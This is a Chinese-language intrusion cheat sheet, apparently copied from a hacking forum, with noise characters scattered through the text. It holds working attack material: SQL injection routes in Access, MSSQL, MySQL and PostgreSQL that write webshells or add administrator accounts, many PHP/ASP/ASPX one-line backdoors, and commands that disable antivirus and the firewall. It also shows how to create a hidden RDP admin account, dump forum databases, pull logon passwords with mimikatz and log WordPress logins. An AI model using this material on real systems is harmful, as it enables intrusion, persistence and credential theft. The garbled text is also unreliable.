SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
& s) @! C# s9 [, L' jaccess中导出shell
) h+ t4 o( v, F3 M7 B% U+ n& D
4 J- s% w3 J8 d  h0 u! b$ y: n中文版本操作系统中针对mysql添加用户完整代码:6 {' R3 U) _% G# H! b
* D6 \2 O: m( ~. I( p. \( O9 u
use test;
4 M# w8 e: D% \: Hcreate table a (cmd text);( q5 g; o* j! ?8 _8 B4 Q" L
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
6 L) |8 C( w3 W9 _- u1 h  r. finsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
1 m1 o4 l: U0 U0 ]8 k% Z% p) B% Ainsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
% B  z; q& p$ C0 q) a7 g7 Jselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";7 ~" ?4 v# [" i5 O8 ^' E
drop table a;
: U5 r: c0 p3 ^' R# r- k
% j$ M' ~# u! K& P) r英文版本:( ]3 A: T' r+ O, P' E' T

5 g; i' b2 B$ B8 j( @  buse test;; V  E& _  M4 g2 ~
create table a (cmd text);
" a* D! `4 V1 d# n% iinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
* S# P! I! c! Y/ d. Kinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );' Z% O0 _4 E8 Z3 g7 b
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
3 \! @7 V6 B9 b" E8 Vselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
, g. l: P+ O2 l( kdrop table a;& z- O8 |8 w! c& {

9 x5 K- J$ \" x% u, Acreate table a (cmd BLOB);: b# i% G! K  o7 j. ~, a( [
insert into a values (CONVERT(木马的16进制代码,CHAR));
( N0 w  V$ v; }" _( e- U+ Dselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
  s  |2 \0 E! e1 U8 S; X: u, W3 ?drop table a;
- |% j& m* h' ^% A9 S% T4 V% V4 J6 b, }6 u2 ^
记录一下怎么处理变态诺顿
+ m  @5 Z7 b) e6 V5 R/ J! J查看诺顿服务的路径" @6 Q% A! V* M; B$ y$ M
sc qc ccSetMgr1 j7 V% n1 A9 V" d( H8 Z" ]
然后设置权限拒绝访问。做绝一点。。
5 X8 V2 O% g! A1 D+ scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
4 y8 M, N- n% E; h9 ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"8 ]& ^5 I: a1 c3 |( y. [/ o
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
' d9 s- |, \  v. w# scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone6 T" T! H. |! ?9 \

9 ]4 z; x/ M# j0 D0 g然后再重启服务器. A2 f2 T* r% |: K
iisreset /reboot2 G4 v) s: }" h+ m+ O, c5 r; O6 N
这样就搞定了。。不过完事后。记得恢复权限。。。。
. N. W! e+ Z6 U; vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
/ \5 U7 K( `: w9 ^! G& u9 A9 M# Acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
6 Y% x9 l9 W& h7 t& acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
$ X. @9 J% i0 w* j7 z  r4 Jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F/ z* w% G" C7 S) ?) q2 `) I
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
# ?' x8 C, ]" t4 f2 G1 i" r5 K8 l# K1 S
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
9 N; \4 M  E# }. D/ ~  z
, D1 U$ X* H8 f; a" }; D+ C7 [postgresql注射的一些东西
" f0 h2 y( d& @如何获得webshell# n8 @, R- a- K. u7 D- r
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); ( x% {. w* Y6 h* b+ G
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
- Y1 R8 |+ e( _7 c2 Khttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;) I0 S1 u8 c2 x, r
如何读文件
, I5 |$ r7 M4 U& ]# E, T  shttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);; S0 k- d' H$ `9 M: y5 J9 _4 x: ]) P* `
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
" ]+ u9 G3 m+ o" ~5 b* |5 Ahttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
' a4 n' I# E% k" w, K, ^' P* H
6 U( e2 p2 s( I) B( s: nz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。: `- f1 {; y' }+ G
当然,这些的postgresql的数据库版本必须大于8.X* q* b3 u# i! e5 ]2 A- N8 r
创建一个system的函数:) H1 Y6 A8 Q) v( y+ t6 Z
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
! |% w2 M8 F" A$ A4 S6 s# @+ X# l/ \4 F8 }6 P7 d) m! \
创建一个输出表:
: c+ Q. i2 z2 v( w  g: E# y2 A. JCREATE TABLE stdout(id serial, system_out text)# E( @1 G# s! d4 {8 ]. K' _% H0 v( N
4 x5 O! q: r: L7 S5 z5 ]
执行shell,输出到输出表内:
7 J0 K) V( v& _2 F& o' \; w* rSELECT system('uname -a > /tmp/test')
, @. o) K; b6 {- A9 g; `' i
7 ?2 R! ?3 Y0 J! ocopy 输出的内容到表里面;0 x4 ?: T% {9 A
COPY stdout(system_out) FROM '/tmp/test') O& w% e3 n6 Q/ L$ G! _( n
* f5 N/ b0 h) @+ g
从输出表内读取执行后的回显,判断是否执行成功9 O2 h5 X8 ?+ r% R
% P, G; d/ k8 N6 r+ N9 J( E5 e
SELECT system_out FROM stdout& Q9 ]- h) _, n7 q/ _3 b' F& I
下面是测试例子
4 L. S* [) m8 u. L. C* c8 V% H5 d& p" ]0 A' h/ l- h
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 3 N4 g% w2 f; x
" m& P) d) |% G( \9 \3 _5 F$ y8 }) @
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'& u- m3 M: H- }% @+ z8 T+ \
STRICT --% ^2 b1 j3 B8 [

% t& R0 Y  i. }+ d) z/store.php?id=1; SELECT system('uname -a > /tmp/test') --
9 g) z5 `$ i! h, V# G- U, B6 ?! ~, h; c" b4 Y7 h
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
& O; ^# d# n& `% M) e7 L+ M# l) o- E$ \/ T9 i6 ~4 R8 T# r5 z8 t
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
% u4 b* l, H( N3 N3 a) F5 Qnet stop sharedaccess    stop the default firewall/ i7 d! L: _) R$ y$ [
netsh firewall show      show/config default firewall
, Y; D  E3 i& k% P( h+ snetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
! E2 k9 B( V7 V( x* E) k, fnetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall' a$ {/ x& `$ b1 d7 `" V
修改3389端口方法(修改后不易被扫出)9 ?! e) ^: |" E# ~" s
修改服务器端的端口设置,注册表有2个地方需要修改
& U+ l8 ~* a% l( o7 q4 i0 e* K$ M. f# s( [! m2 \  A
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
% G8 H7 W% U7 PPortNumber值,默认是3389,修改成所希望的端口,比如60004 P" m# X, M, Q* W# H) [1 y4 x
" s8 J/ s* n8 K5 B( g) L
第二个地方:) c0 N$ h2 J2 z  q6 I. Z/ j! j' d! _
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] : T& j9 I% i, z2 [7 R
PortNumber值,默认是3389,修改成所希望的端口,比如6000, x2 x2 U( C: I0 n$ c
8 M# I0 Z. n; [) Z/ d4 W: ~
现在这样就可以了。重启系统就可以了9 G; _" W; N% U: J

, w  K/ Z: |$ H) [  I2 q% H6 J- s/ `- J查看3389远程登录的脚本! Q6 T1 K2 ?. X2 ~
保存为一个bat文件
; ~1 ]* l2 Y! i) p* T3 G8 J1 Jdate /t >>D:\sec\TSlog\ts.log) [) D; T) H# y9 Q" F) g
time /t >>D:\sec\TSlog\ts.log* q5 B1 b) `8 @5 I$ b1 Y7 c% \# m
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log0 o  a9 O' |& Z0 b9 |
start Explorer
: Y( i4 n& \# p" R  S9 {' r
7 T. D  Q+ b$ h* w% n' V+ Zmstsc的参数:  S/ E) E; G0 v
% G' N+ B( t6 h# Y+ ?
远程桌面连接
8 w/ O9 r% `" c6 \7 u. l
4 N  S2 {; C/ m- e3 LMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]% u0 i( K5 d  k$ K
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?" i) F8 \9 a. S' l1 v) h

; U) D$ H+ q" s5 t* {$ |<Connection File> -- 指定连接的 .rdp 文件的名称。# H5 b# B: H+ ]0 z2 u8 h
' W. x! o- E4 p3 b
/v:<server[:port]> -- 指定要连接到的终端服务器。/ K, l& O+ }' O' r1 U

# r( {( R/ w' B# n! A/console -- 连接到服务器的控制台会话。9 @: d! b5 w& Y5 s' [

$ X8 n8 J7 Y; D4 p* Y/f -- 以全屏模式启动客户端。
7 e! l: Y) t/ p2 G* H- ^2 M& X0 @, W1 i, q, F) b2 T
/w:<width> --  指定远程桌面屏幕的宽度。' b; f0 c8 [) O( E, r
, Y7 s. h; C$ c; M" z
/h:<height> -- 指定远程桌面屏幕的高度。( o$ A  S' W; V, ~  }1 C
% ^- {$ `& `. y" T, |8 W
/edit -- 打开指定的 .rdp 文件来编辑。+ b3 M, \! t. ~" K: I: D  B5 |8 A! r

+ h7 g* H# m, }/ q/migrate -- 将客户端连接管理器创建的旧版
5 _; k* Q: E3 K# e连接文件迁移到新的 .rdp 连接文件。0 |2 Y% I- v; v; {  h% t" \
! Z2 f$ Y2 j1 b8 U6 `8 K

) W0 c- P' O( t5 W& ^其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就( m; H5 @& h5 [8 c4 r' c# R
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
0 u$ u3 t  x% ^) Q( x1 ^7 k4 ~' I8 u2 z
命令行下开启3389
) w, q" l8 m+ g/ a% [5 ]7 m, bnet user asp.net aspnet /add
( n: c5 |5 `9 m5 J( P. hnet localgroup Administrators asp.net /add4 w1 ~0 a2 T! [' r+ l
net localgroup "Remote Desktop Users" asp.net /add/ B( ^4 k6 [' K$ T6 Z6 k( N4 `7 u! o
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D0 h  r9 y+ C3 T- O  L0 u
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 07 N9 i! {& S6 Q+ n+ ^- W+ O% x) ?
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1- j, I8 u3 H- d! c3 [% _: v3 x' d
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f* x* m- p; m/ S1 L' d6 z6 z
sc config rasman start= auto6 v% e& L1 x0 |! P  m( D
sc config remoteaccess start= auto6 q! z$ @; }0 m+ Y% D2 K0 A
net start rasman
2 U6 k) m& C# G9 N# g" Knet start remoteaccess+ U; K1 q3 g' {( E% b& l
Media
1 w& M: Q3 G! H- T9 b2 W" `<form id="frmUpload" enctype="multipart/form-data"" [- ^# J: B! O
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>' w! I( y" O1 z
<input type="file" name="NewFile" size="50"><br>, C1 D  `3 o9 j& b0 r
<input id="btnUpload" type="submit" value="Upload">
& l) [, U- Q+ M- s</form>/ \% A2 N( l- z$ e

. d, {+ A0 F* n; acontrol userpasswords2 查看用户的密码3 B4 O; M6 m  H; c: U/ |7 h
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
  n/ n. E9 }" |5 USELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a& M3 m1 y4 f1 ^4 E8 @% X
6 x9 d% b+ E6 @% y$ h6 d" d
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
2 f2 H7 y/ {, }测试1:
/ U& H+ a& e5 V* ]' q# {: T1 G- c" sSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t11 |$ o0 I  z0 C/ X
7 k) Y7 M# A, U8 R1 [; I2 y: X
测试2:
6 X. o5 t( v4 I7 N8 H
+ c$ B; a% A4 n* @* ]create table dirs(paths varchar(100),paths1 varchar(100), id int)
& @- ~6 t# [7 D; W8 n8 ^  D) w+ q. K( r0 F2 a5 o
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
! }) `7 Y  n: t
1 t7 V- B0 T* A6 [: m7 USELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
5 u% @- V! U' o* r- `关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
# t" _; z4 Q+ I. z7 T可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;& S% Q3 c6 ?3 L1 b1 Q. @/ T
net stop mcafeeframework
4 y8 _) b- i; G% P$ znet stop mcshield5 |& D( B0 Z% q' E8 c
net stop mcafeeengineservice
4 l8 Z, d0 f/ _! O* Onet stop mctaskmanager3 N8 t& ]: f. i
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D/ O$ k; |0 ?9 ~2 {9 ?  l

/ m% k* x5 B- c  VNCDump.zip (4.76 KB, 下载次数: 1)
& k5 K  _$ V9 a: r密码在线破解http://tools88.com/safe/vnc.php( i$ ^5 E6 A5 D# v  n; K; s
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取  a* S" e' U: H' O" ?
, p3 c6 v3 C5 J2 h: e
exec master..xp_cmdshell 'net user'; w$ `- Y% M. g+ q
mssql执行命令。
3 Y% {7 h4 q& B7 [0 N获取mssql的密码hash查询; x1 a/ I% U. }4 k7 ?
select name,password from master.dbo.sysxlogins# E7 i/ w" ~6 Z1 W" c. n& _, \
- p& L, B! f2 P9 x6 s+ q1 V! n) M
backup log dbName with NO_LOG;7 ^! e- c9 w, k( f6 A5 B
backup log dbName with TRUNCATE_ONLY;
0 W  ^# f, @! A& F4 ZDBCC SHRINKDATABASE(dbName);
; e: W/ w% b3 D$ H- {7 d' rmssql数据库压缩
* T- E4 J  f7 e$ X2 C$ z7 {$ l$ `3 d& U1 j; U9 Y! |+ Q7 S
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
5 I7 ]% P+ G" N+ l0 A( @将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。0 [7 H" D: e- A1 S8 @) Y

1 c/ D' I; s& n, ]0 n3 |/ \backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'* J# k3 i) h5 \" I
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
' s$ \* i8 H& I, U) v
, N9 t% p8 d5 qDiscuz!nt35渗透要点:
. U) T. e, x6 k; G0 A  J, T6 D(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
6 r( Y3 B9 b7 N# c6 ]2 T(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>4 Y4 Q' I: ^# b6 I6 Q
(3)保存。0 o: z+ v0 _3 S1 }7 F9 m8 U$ X
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass+ u0 Q& W8 }7 H
d:\rar.exe a -r d:\1.rar d:\website\
6 T, {' p( K: h/ k/ @+ f4 @/ p递归压缩website& Y, y/ T6 m; l8 a* j
注意rar.exe的路径
8 A5 _& m9 q+ t2 ~" m/ l
! j1 {1 ^& {, s% `- H$ H/ D<?php5 B/ i5 o; H" q3 a0 W

2 d- ?! |( O% F$telok   = "0${@eval($_POST[xxoo])}";
/ }- i/ u! r$ W+ A+ ]0 H9 Q0 m  k0 a5 ?* a) X9 Q
$username   = "123456";
& z' A* r% R- |" F
1 X) L6 i7 K5 T" A# u$userpwd   = "123456";
; A( a  h3 j3 Z8 R) W. `- N. v7 F" L7 Q+ y
$telhao   = "123456";6 i$ Y; K2 t  G# d! `

5 h) J) }0 ?& s2 m9 F2 i+ ^$telinfo   = "123456";
0 I! G& a4 X" N- F) j% A  m* @  S6 Y3 K( Z, j
?>
; g8 K( l* N) B6 ^/ Ephp一句话未过滤插入一句话木马( D! g8 [( r  a0 r0 c

: R: z; _8 @- f/ L3 f5 T: Z站库分离脱裤技巧
+ s1 o* _* c+ }: W9 N. \exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
- F! O7 I" s; Y$ hexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'% Z! o0 a2 G% @4 f! ^; ]9 ]
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。+ V  I* t, C+ {" G" Z* f& @! ]7 B
这儿利用的是马儿的专家模式(自己写代码)。, b4 s/ K: Q* q; }" g7 d; X5 E
ini_set('display_errors', 1);
! G) @& O8 Z, u) o. v6 A# R( ~set_time_limit(0);* l1 e0 _: A7 Y: Y3 x+ u
error_reporting(E_ALL);
2 ^5 M# |' n0 t- L6 t+ a$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());1 k3 U! N- x2 N3 R+ v. t
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());; J, v# C2 l! j8 Y' j1 J" P
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());* J3 ?0 S1 O$ X4 F) t- r0 x
$i = 0;+ H4 h' U# @3 w4 D& G& g
$tmp = '';
) ?7 |/ }$ n- Iwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {. k6 X& g6 @9 D7 C1 l* i$ o
    $i = $i+1;: [8 C- L2 |. n) A6 s2 D
    $tmp .=  implode("::", $row)."\n";% R; c' }$ A) D, P! j: o
    if(!($i%500)){//500条写入一个文件& g( ^! v3 C) F# I4 S" u% A: x2 O
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
4 q% G5 M4 ^# V1 B* c5 i! U- `        file_put_contents($filename,$tmp);+ u3 d0 C+ z6 v8 [1 C* p- H+ H, K5 a
        $tmp = '';
, p, q( @% a+ l% ]3 z; e    }
4 ^; U- l4 S% W3 B* [. n4 U- E2 P- n}
3 K8 S- R( k3 C* d% W: kmysql_free_result($result);
+ X& r: Q$ ^, Y& O) w
( h8 I  J: c7 D
' h; O& ~! J& h4 o# V
7 q/ j4 m+ e/ r$ s$ B//down完后delete
, P7 ?- ?8 \$ k- `" c
1 d# C3 r/ n$ ^! U3 d# s! R! ~. B- g
% [3 D$ y# s/ {7 p2 ?$ q3 Rini_set('display_errors', 1);
( s6 B2 i$ Y3 Q' d4 Oerror_reporting(E_ALL);  B; H8 Z& J; g& y5 x9 o/ L' z! l( h+ \
$i = 0;
) D" m* u% ]6 E+ a) }while($i<32) {( E8 c2 b, R: H, q
    $i = $i+1;
9 k4 F& @% V$ _        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
5 ?3 h' c5 J; W. q& S9 ^        unlink($filename);
- _" w: [% i* w; r0 o5 p}
) n! A" v& ]+ Q7 |( K/ Ihttprint 收集操作系统指纹
2 J2 o* |! y) _. G扫描192.168.1.100的所有端口
$ v4 E% F8 D, W! F9 I' U% vnmap –PN –sT –sV –p0-65535 192.168.1.100
1 O6 U! V1 J+ r  @  Ghost -t ns www.owasp.org 识别的名称服务器,获取dns信息3 T( e4 t; F2 K
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
* T. H3 B  T6 q  C& r' ?* I9 nNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
  k# E+ M% [0 t- V/ P
: ^3 ~; g2 c; sDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)5 e& B  s" }8 ^, _# E7 g3 K2 g

8 B, r4 ~+ k. `, Y! r( P9 u% N  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
. j9 b& E8 h& a  N2 ?# B! L) S# C5 w1 A3 x7 Y* H4 g
  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
* M1 K$ ~1 ^' Y2 t
1 ~' m! n5 ~; @$ S3 c+ K  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
6 O, }- Z1 G6 [) F
4 w2 r& T: h7 K( @' x* M0 c$ z  http://net-square.com/msnpawn/index.shtml (要求安装)0 M# l- [; Y! I1 ?8 _
0 A3 V; W' \$ D: Q
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
: \- f" J1 b8 P4 s! C
- F: I7 @9 z- I, a  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)- J6 Q# [' V7 |" a; \
set names gb2312
! Q! [& ?% R, g( v& U导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
, D7 `. R! s; i" a6 g
- m% ^5 O% T( Y# W4 ~# F8 q' wmysql 密码修改
" e8 Q" E& O" \  `3 g6 vUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” - z3 U7 S5 G' q6 G5 Y9 }
update user set password=PASSWORD('antian365.com') where user='root';. F# x0 R  e( }
flush privileges;- K8 [; V& l% |
高级的PHP一句话木马后门
5 h- z* |+ {, f# r) W- s
) f5 G: l. {1 T7 ^: m8 B入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀# i) p5 z% I0 N
# c/ R* A8 a8 J/ H9 w$ ~
1、0 P; W, A6 d$ q; K+ U$ l" k0 V: c
  F! }( [7 S# K
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
4 {* F; |; N0 j' L2 C
3 a' G6 O0 L0 N0 D' q7 z8 {3 M0 @7 }$hh("/[discuz]/e",$_POST['h'],"Access");
( x0 _; `" R( j8 r" g& \/ X# L2 d- l; l7 D8 y7 W5 L( \# U
//菜刀一句话
& R# `; @5 W! H  R- ?+ R; l
# j- q, I% _- @0 U, m$ f  r: `: I; E2、) O+ X% D: X" ?# U

8 ~. y4 H8 M) c9 b9 S# U5 T$filename=$_GET['xbid'];1 }6 h9 \! U$ q( u4 h. F

0 }( ^2 y) q1 A$ l/ Uinclude ($filename);
  e8 A, `2 {6 a4 a  _9 S# _( [3 t4 E0 M. \' h5 r+ C8 ~
//危险的include函数,直接编译任何文件为php格式运行
/ C. L1 M6 [" Y1 Y
: w% ~5 I2 ^7 D3、/ `- r  ?  n- W5 m# I

% g0 O. v: Y& l# k8 D! X/ u9 U$reg="c"."o"."p"."y";0 L; A% x9 I; P0 V' `# ^  S

; u) n3 k( W. L3 J- |- h$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
7 X& M4 l  E( L+ u# H$ g2 P8 @+ a( G( L/ h2 Z5 ~
//重命名任何文件, O6 Z  u9 ~+ S2 F! x
; k& _/ @; H  x  t" }
4、% [6 Q: K6 p1 W" ?) ~; h6 e. v4 b, n
: n/ h8 H# C+ O
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";8 S; h( F. |  ?6 T7 D
: _6 @, h7 f0 u
$gzid("/[discuz]/e",$_POST['h'],"Access");) A( {- d/ d& F6 a8 {# U5 k
# d+ A) L  M3 I
//菜刀一句话
" W, e6 @0 |3 l* z6 g5 x6 N& |  P* Z# H* @% `# H' `
5、include ($uid);2 j. k: [8 U: S8 _% x) ]9 ^
: _$ B0 V% l) k# B+ A& Y
//危险的include函数,直接编译任何文件为php格式运行,POST # b  X7 Q- v5 R) ^  n: s
* i$ [' ?% f5 E: F- W
/ R0 T: s* e. y/ w, m2 e9 H
//gif插一句话( E; h. x- x  p* S9 F
2 ^" ~- s- Y+ X( r6 j% |( Y* n
6、典型一句话. J8 O3 E' G4 Y/ ^- R

5 B- _0 l0 t) ^1 a$ o程序后门代码- M7 O9 u) d! i# V. z) M" v- o
<?php eval_r($_POST[sb])?>' Z  c. ?9 o9 {7 ~( I/ x
程序代码
% E( E# y$ U7 J  ^<?php @eval_r($_POST[sb])?># t% B% m1 F7 a' \, f
//容错代码. i( f- y! n2 |6 L: [( o. P" e8 t
程序代码
+ H/ Y. e( n, w3 F<?php assert($_POST[sb]);?>
, w  X3 a& x0 Z4 N//使用lanker一句话客户端的专家模式执行相关的php语句
, v8 \3 s5 N2 a* {. G程序代码
: |7 Z! M5 }$ e! k0 R) s+ K5 J5 l<?$_POST['sa']($_POST['sb']);?>" u0 _# L% {4 u' I' O7 j! `
程序代码# ]' h5 k! F# R0 y) i: G) o( }
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
1 |% n; [) U3 ^! I. G" f6 m程序代码( ]3 @  f# V2 v+ ?, e8 D
<?php9 {* N+ c2 k4 J, J* W) P, z
@preg_replace("/[email]/e",$_POST['h'],"error");
+ R  X& l  S4 E, i7 i. h?>
. v2 C' i4 R+ y! \& b//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
% U, V2 r/ |* y% a$ T! J1 b# u1 X程序代码% u. S  Q; q& ~. M/ ^4 f8 `
<O>h=@eval_r($_POST[c]);</O>! b. Y9 H. d( f* z, ?
程序代码
! F' E$ M# d! o! H+ I5 q; L* q<script language="php">@eval_r($_POST[sb])</script>3 Y* P6 w/ J/ t+ k8 X5 {
//绕过<?限制的一句话- g) r  m3 p) I8 \" G

& U' l2 c4 W7 F% l1 h0 Ehttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip. h+ p' u( y! Z) }& L: F, s
详细用法:1 u' d# W/ q# J) Z2 r2 h
1、到tools目录。psexec \\127.0.0.1 cmd
; C# ^9 L0 X% Q( N$ ?2、执行mimikatz
0 z1 v- l5 ?, k' C; @2 A6 p6 h/ o3、执行 privilege::debug) q$ z; J7 t9 ~0 Z2 k" q
4、执行 inject::process lsass.exe sekurlsa.dll
( [' O- l! T& q- W5、执行@getLogonPasswords8 r( C* @0 v$ G& P2 Z
6、widget就是密码$ U9 E# u  x& s. b
7、exit退出,不要直接关闭否则系统会崩溃。5 D5 i+ r& B  i

& v/ ?7 `. b/ Z: ^3 B9 Mhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面: W8 i2 E1 ^7 M4 k* H+ j& E

$ F! `5 H+ F$ _% k5 |! U自动查找系统高危补丁
3 N+ K$ E0 @; W( F- I1 y3 Fsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt3 t' a* `; M+ p& ]
+ Y8 f& b' p3 @+ C. T! v/ _. ?
突破安全狗的一句话aspx后门
! ~; X3 p2 l: T<%@ Page Language="C#" ValidateRequest="false" %>
1 J6 b% p. l5 F% N* [$ u<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>! a$ f. r* m) ^5 s  r
webshell下记录WordPress登陆密码
) `% K1 l! p( t; gwebshell下记录Wordpress登陆密码方便进一步社工
, u- T; u  t$ V在文件wp-login.php中539行处添加:" B- B# o6 x: o$ X
// log password
% R; w( |6 D- B4 z6 i2 h) P1 Y$log_user=$_POST['log'];
' V- h1 p  k, @# O$log_pwd=$_POST['pwd'];
+ g1 f& J2 J3 N$ B( m8 E7 `$log_ip=$_SERVER["REMOTE_ADDR"];# Q% @% |* _7 M. ~  m% i
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;7 J7 L. b) _$ @1 I0 y
$txt=$txt.”\r\n”;1 U) W4 N" {, R, C
